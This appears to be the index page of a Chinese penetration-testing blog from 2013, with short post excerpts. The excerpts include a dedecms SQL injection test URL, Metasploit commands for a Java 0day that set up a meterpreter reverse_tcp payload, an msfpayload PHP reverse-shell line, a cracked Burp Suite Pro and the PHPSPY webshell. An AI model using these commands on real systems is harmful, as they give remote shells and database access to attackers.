本博客只做技术文章、工具的收藏!

feed订阅 新浪微博 你好,欢迎光临! 

Web漏洞实战教程(DVWA的使用和漏洞分析)2013完整版

2013.01.25 , , No Comments ,

点击下载 转自:https://forum.90sec.org/thread-4902-1-1.html

天蝎座扫描器ScorpioScan 官方版

2013.01.24 , , No Comments ,

之前一片文章用到的工具 有各种求 答应大家的 就发布出来吧 免得大家去下载绑马的 先丢上MD5:3c0dbfd630ca3193d03665dfa9ee9524 自行校验下 介绍: 天蝎座扫描器 V3 是一款WEB程序安全检测工具,请经行有授权的安全检测或者程序开发自检。 加压密码:sniffer.pro 【杀软报毒】: 1.首先确定你的软件来自scan.sniffe...

[通杀]dedecms plus/search.php 注入漏洞利用方式

2013.01.19 , , No Comments ,

哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站  放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。 既然已经发出来了,我就把我自己搞的exp发下吧。。唉。 我一般是这样测试的: 提交 xx.com/plus/search.php?keyword=as&typeArr[1 uNion 1]=a 转...

[转载]一点密码破解的心得(更新字典)

2013.01.18 , , 1 Comment ,

其实主要是来科普下hashcat系列的,如果用过的就撸过吧。 Hashcat-plus是目前我见过的支持算法最多的GPU破解工具,支持Windows和Linux。另外带了Jumbo补丁的John貌似也不错,没怎么用过,不发表评论。 Hashcat系列有3个版本,这也是很多人一开始容易搞混的地方。三个版本分别是hashcat、 oclhashcat-lite和oclha...

burpsuite_pro_v1.5破解版

2013.01.18 , , No Comments ,

就不介绍跟截图了,大家都懂的.... 百度云盘下载

PHPSPY 2013 发布

2013.01.13 , , 2 Comments ,

PHPSPY 2013 功能改变可以看之前的预告: http://www.sablog.net/blog/phpspy2013_advance_notice/ 今天是本人的结婚周年纪念日,所以就发布了,当礼物送给我老婆,虽然我老婆什么都不懂。 PHPSPY 2013也是最终版,以后应该不会继续更新了。如有BUG,请在此留言,本人会及时修正。 最后预祝大家2013年,万...

[更新]新年初始,Java惊爆首个0day

2013.01.11 , , No Comments ,

use exploit/multi/browser/java_jre17_jmxbean set SRVHOST 192.168.178.26 set TARGET 1 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.26 exploit sysinfo getu...

[整理]34个windows平台渗透测试工具

2013.01.11 , , 1 Comment ,

大多数渗透测试人员喜欢使用MAC或者LINUX平台进行渗透测试工作,但是由于许多工具是windows平台的,所以大家可能会需要一个清单,方便把这些工具装在windows虚拟机上,于是就有了本文。 列表(点击工具名链接即可下载) HashCheck Shell Extension HashCheck Shell Extension可以很方便的计算和验证文件Hash。 &...

Web安全漏洞被动扫描工具—Watcher v1.5.6(Fiddler插件)

2013.01.10 , , No Comments ,

Watcher是一个实时的,被动分析基于HTTP协议的Web应用程序的安全工具(Fiddler插件)。所谓被动分析就是指它不会对现有系统产生任何破坏。Watcher可以被安全的用于分布式网络,共享式网络和专用宿主网络。Watcher能够自动检查这些问题:cookie设置、SSL配置、信息泄露等。另外,Watcher是一个非常好的HTTP协议调试工具,不过,它的HTTP...

Metasploit 之使用socket通信的webshell简单分析

2013.01.10 , , No Comments ,

0x01 前言 常规的webshell都是调用该语言中习惯函数来完成读取、执行等操作,从协议上来讲是采用http/https协议。但是和服务器通信还有另外一种方式:socket通信。 常见的脚本语言asp,php,jsp,都可以实现对应的socket编程。例如使用msf中: msfpayload php/reverse_php LHOST=自己的IP LPORT=端口...